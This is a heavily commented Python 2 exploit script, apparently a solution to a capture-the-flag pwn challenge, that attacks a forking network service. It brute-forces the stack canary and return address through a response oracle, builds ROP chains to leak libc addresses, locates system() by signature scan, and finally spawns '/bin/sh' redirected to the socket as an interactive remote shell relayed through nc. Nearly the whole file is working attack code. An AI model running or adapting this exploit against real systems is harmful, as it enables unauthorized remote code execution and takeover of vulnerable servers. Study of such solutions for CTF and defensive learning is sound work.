#!/usr/bin/env python
#
# learning python and making use of my ocd by sharing heavily commented scripts
# i've probably spent too much time on because i had nothing better to do (part 1):
# solution for a pwn challenge (the name of which is intentionally omitted to prevent spoilers)
# binary: https://bit.ly/2Pdu90o
#
# by Sami Alaoui (thedroidgeek)
#
import os | |
import sys | |
import time | |
import struct | |
import threading | |
import subprocess | |
def syncstdin(o):
    """Forward every line read from our stdin to ``o.stdin``.

    Intended to run on a background thread.  ``o`` is any object exposing a
    writable ``stdin`` attribute (main() passes the nc Popen object).

    Returns once our own stdin reaches EOF.  readline() blocks until a line
    is available and only returns '' at EOF, so treating '' as "nothing yet"
    (as the previous loop did) spins forever at full CPU.
    """
    while True:
        line = sys.stdin.readline()
        if not line:  # '' == EOF, stop instead of busy-looping
            break
        o.stdin.write(line)
        # make sure the line leaves immediately even if the pipe is buffered
        o.stdin.flush()
def syncstdout(o):
    """Copy every line read from ``o.stdout`` to our stdout.

    Intended to run on a background thread.  ``o`` is any object exposing a
    readable ``stdout`` attribute (main() passes the nc Popen object).

    Returns once ``o.stdout`` reaches EOF.  readline() only returns '' at
    EOF, so the previous loop kept spinning at full CPU after the remote
    side closed the stream.
    """
    while True:
        line = o.stdout.readline()
        if not line:  # '' == EOF, the other end is gone
            break
        sys.stdout.write(line)
        # show remote output right away, even when stdout is not a tty
        sys.stdout.flush()
def spawn_process(debug=False):
    """Open a fresh connection to the target through ``nc`` and return it.

    Uses the module-level globals ``host`` and ``port`` (set by main()).

    debug -- when true, print a pid hint and sleep 10 seconds so a debugger
             can be attached before any payload is sent.

    Returns the subprocess.Popen object with stdin/stdout/stderr piped.
    Exits the script (SystemExit, status 1) if the first 10 bytes received
    do not contain the 'Username: ' prompt.
    """
    # spawn netcat process
    p = subprocess.Popen(['nc', host, port], stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # check we got a valid session (bytes literal == plain str on python 2)
    banner = p.stdout.read(10)
    if b'Username: ' not in banner:
        # don't leave a stray nc behind when bailing out
        if p.poll() is None:
            p.kill()
        p.wait()
        print('unexpected nc output - check your connectivity')
        sys.exit(1)
    # delay for debugger attachment
    if debug:
        # NOTE(review): this prints nc's pid + 1, presumably a guess at the
        # pid of the process one wants to attach to - confirm before relying on it
        print('waiting for debugger (pid: ' + str(p.pid+1) + ')...')
        time.sleep(10)
    return p
def finalize_payload(payload):
    """Return ``payload`` with every byte XORed with 0xD.

    The target XORs its input buffer with the single byte 0xD before the
    memcmp, so applying the same XOR up front makes the intended bytes come
    out on the other side.

    payload -- a str (one character per byte), or a bytes/bytearray object.

    Returns a str for str input and bytes for bytes/bytearray input.  The
    result is built in one pass instead of re-slicing the whole string for
    every character.
    """
    # on python 2 ``bytes`` is ``str``, so plain strings take the str path
    if isinstance(payload, (bytes, bytearray)) and not isinstance(payload, str):
        return bytes(bytearray(b ^ 0xD for b in bytearray(payload)))
    return ''.join(chr(ord(c) ^ 0xD) for c in payload)
def sig_scan(buf, sig):
    """Find the first offset in ``buf`` matching the byte signature ``sig``.

    buf -- the data to search: a str (one character per byte) or a
           bytes/bytearray object.
    sig -- whitespace separated tokens; each token is either a two digit
           hex byte ('48', 'FF', ...) or a wildcard ('?' or '??') that
           matches any byte.

    Returns the index of the first match, or None when there is no match,
    when the buffer is shorter than the signature, or when the signature is
    empty.  Raises ValueError for a token that is not valid hex.
    """
    # extract the expected byte values from the sig string; None == wildcard
    pattern = []
    for token in sig.split():
        if token in ('?', '??'):
            pattern.append(None)
        else:
            pattern.append(int(token[0:2], 16))
    if not pattern:
        return None
    # compare integers so both str and bytes buffers behave the same
    if isinstance(buf, (bytes, bytearray)):
        data = bytearray(buf)
    else:
        data = [ord(c) for c in buf]
    # scan the supplied buffer (the range is empty if buf is smaller than sig)
    for start in range(len(data) - len(pattern) + 1):
        for k, want in enumerate(pattern):
            if want is not None and data[start + k] != want:
                break
        else:
            return start
    return None
# every byte we send gets XORed with 0xD by the target, so values recovered
# from the bruteforced (raw) payload must be XORed back, 8 bytes at a time
_XOR_MASK64 = 0x0D0D0D0D0D0D0D0D


def _p64(value):
    """Pack ``value`` as a little-endian unsigned 64-bit integer."""
    return struct.pack('<Q', value)


def _frame_tail(check_func, stack_canary, stack_addr):
    """Return the 24 bytes overwriting the canary, saved rbp and return address."""
    tail = _p64(stack_canary)
    tail += _p64(stack_addr - 0x488)  # top of rop chain (saved rbp)
    tail += _p64(check_func - 0x269)  # leave ; ret (to rewind stack)
    return tail


def _write_payload(check_func, stack_canary, stack_addr, buf_addr, count):
    """Build the (not yet XORed) payload whose rop chain calls write(4, buf_addr, count)."""
    chain = _p64(check_func + 0xAE)    # pop rdi ; ret
    chain += _p64(4)                   # 1st arg (rdi): file descriptor (socket)
    chain += _p64(check_func + 0xAC)   # pop rsi ; pop r15 ; ret
    chain += _p64(buf_addr)            # 2nd arg (rsi): buffer
    chain += _p64(0)                   # r15, unused
    chain += _p64(check_func - 0x372)  # pop rdx ; ret
    chain += _p64(count)               # 3rd arg (rdx): count
    chain += _p64(check_func - 0x5B5)  # write()
    chain += 'A' * 968                 # pad the 64 byte chain up to 1032 bytes
    return chain + _frame_tail(check_func, stack_canary, stack_addr)


def _bruteforce_frame():
    """Stage 1: recover canary, saved rbp and return address one byte at a time.

    Returns the raw payload (1032 filler bytes + the 24 guessed bytes, still
    in their XORed-on-the-wire form).  Exits the script with status 1 if a
    byte cannot be found.
    """
    payload = 'davide'      # the username (oracle trigger)
    payload += 'A' * 1026   # padding
    oracle_str = 'Username found!'
    for i in range(24):
        iter_num = 0x100
        if i == 16:  # 1st known ret addr byte
            byte = 0xC5 ^ 0xD
            print('skipped #' + str(i+1) + ': ' + hex(byte))
            payload += chr(byte)
            continue
        elif i == 17:  # 2nd half-known byte
            iter_num = 0x10
            oracle_str = 'Username: '  # oracle change (kept for bytes 18..24 too)
        for j in range(iter_num):
            p = spawn_process()
            if i == 17:
                # only the most significant nibble is unknown; the low nibble
                # is 0xE, sent XORed (0xD has a zero high nibble, so XORing
                # just the low nibble is equivalent)
                curr_byte = (j << 4) | (0xE ^ 0xD)
            else:
                curr_byte = j
            p.stdin.write(payload + chr(curr_byte))
            if oracle_str == p.stdout.read(len(oracle_str)):
                print('got byte #' + str(i+1) + ': ' + hex(curr_byte))
                payload += chr(curr_byte)
                if i > 16:  # don't leave hanging prompts
                    p.stdin.write('\n')
                break
        else:
            # no candidate produced the oracle string
            print('failed to get byte #' + str(i+1) + ' :(')
            sys.exit(1)
    return payload


def main():
    """Run the four exploit stages against ``host port`` given on the command line.

    Sets the module-level globals ``host`` and ``port`` used by
    spawn_process(), then: bruteforces the stack frame, leaks a libc
    address, dumps libc memory to locate system(), and finally spawns an
    interactive shell relayed through nc.  Blocks until the final nc
    session terminates.  Exits with status 1 on usage errors or when a
    stage fails.

    Written for python 2: payloads are built by concatenating struct.pack()
    output with plain str literals.
    """
    global host, port
    if len(sys.argv) != 3:
        print('usage: ' + sys.argv[0] + ' [host] [port]')
        sys.exit(1)
    host = sys.argv[1]
    port = sys.argv[2]
    # connectivity test
    spawn_process().stdin.write('\n')
    #
    # stage 1: bruteforce the stack canary, previous base pointer, and the return address
    #          in order to bypass ASLR - this is possible because the process forks itself
    #          on each socket connection, which implies preserving the address space layout
    #          of the parent process, which allows us to guess stack saved info by simply
    #          knowing whether the program successfully returned from a function call, or not
    #          (by expecting output from the caller function - 'Username found!', in our case)
    #
    # note: bruteforcing the return address (last 8 bytes), however, is done by using the
    #       check_username function call as an oracle (expect 'Username: ' in stdout):
    #           .text:0000XXXXXXXXXEC5    mov     eax, [rbp+fd]
    #           .text:0000XXXXXXXXXEC8    mov     edi, eax
    #           .text:0000XXXXXXXXXECA    call    check_username
    #       we use EC5 as the least significant '3 hex digits' (ASLR doesn't affect these)
    #       to eliminate the chance of accidentally calling unexpected blocking code,
    #       which would otherwise freeze the bruteforcing process...
    #
    print('bruteforcing stack canary, saved rbp, and retn address (24 bytes)')
    print('hang tight, this could take a while...')
    payload = _bruteforce_frame()
    stack_canary = struct.unpack('<Q', payload[1032:1040])[0] ^ _XOR_MASK64
    stack_addr = struct.unpack('<Q', payload[1040:1048])[0] ^ _XOR_MASK64
    check_func = struct.unpack('<Q', payload[1048:1056])[0] ^ _XOR_MASK64
    print('canary: ' + hex(stack_canary))
    print('saved rbp: ' + hex(stack_addr))
    print('check_username call @ ' + hex(check_func))
    #
    # stage 2: leak a libc function's address to bypass ASLR on libc
    #          using a rop chain that calls write(4, ...) on a function's .plt.got entry
    #          note that '4' is the file descriptor returned from the socket accept() call
    #
    print('leaking a libc address from .plt.got...')
    p = spawn_process()
    payload = _write_payload(check_func, stack_canary, stack_addr,
                             check_func + 0x2011C3,  # atoi() entry on .plt.got
                             8)                      # sizeof(void*)
    p.stdin.write(finalize_payload(payload))
    libc_atoi = struct.unpack('<Q', p.stdout.read(8))[0]
    print('atoi @ ' + hex(libc_atoi))
    #
    # stage 3: leak memory around the libc function to scan for system() with a signature
    #          since libc versions (and therefore offsets) differ across machines/distros
    #
    print('leaking 0x40000 bytes of libc memory...')
    p = spawn_process()
    payload = _write_payload(check_func, stack_canary, stack_addr,
                             libc_atoi - 0x20000,  # start 0x20000 bytes before atoi()
                             0x40000)
    p.stdin.write(finalize_payload(payload))
    libc_dump = p.stdout.read(0x40000)
    if len(libc_dump) == 0:
        print('failed to receive bytes :(')
        sys.exit(1)
    print('scanning for system()...')
    offset = sig_scan(libc_dump, '''48 85 FF 74 0B E9 ? ? ? ? 66 0F 1F 44 00 00 ? ? ? ? ? ? ? ? ? ? ?
                                    E8 ? ? ? ? 85 C0 0F 94 C0 48 83 C4 08 0F B6 C0 C3''')
    if offset is None:
        print('failed to find system() :(')
        sys.exit(1)
    # the dump starts 0x20000 bytes before atoi(), so rebase the offset
    system_addr = libc_atoi + offset - 0x20000
    print('found system() at offset ' + hex(offset) + ' (' + hex(system_addr) + ')')
    #
    # stage 4: spawn a shell with stdin, stdout and stderr all redirected to
    #          to the socket file descriptor (4), so we can actually interact with it
    #
    print('popping a shell...')
    cmd_str = '/bin/sh 0>&4 1>&4 2>&4'
    p = spawn_process()
    payload = _p64(check_func + 0xAE)                      # pop rdi ; ret
    payload += _p64(stack_addr - 0x79 - len(cmd_str))      # command string address
    payload += _p64(system_addr)                           # system()
    payload += 'A' * (1007 - len(cmd_str))
    payload += cmd_str + '\0'  # the actual command string, null terminated
    payload += _frame_tail(check_func, stack_canary, stack_addr)
    p.stdin.write(finalize_payload(payload))
    # hi linux
    p.stdin.write('uname -a\n')
    # emulate an interactive shell: relay our stdin/stdout through nc on
    # daemon threads so they never keep the interpreter alive
    stdint = threading.Thread(target=syncstdin, args=(p,))
    stdoutt = threading.Thread(target=syncstdout, args=(p,))
    stdint.daemon = True
    stdoutt.daemon = True
    stdint.start()
    stdoutt.start()
    # wait for nc session to terminate
    p.wait()
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: leave immediately with status 0.  os._exit() skips normal
        # interpreter shutdown (presumably to avoid waiting on / noise from
        # the relay threads), which also means buffered output is not
        # flushed for us - so flush it by hand first.
        try:
            sys.stdout.flush()
        finally:
            os._exit(0)
# (web page footer captured along with the script; kept as a comment so the file parses)
# Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment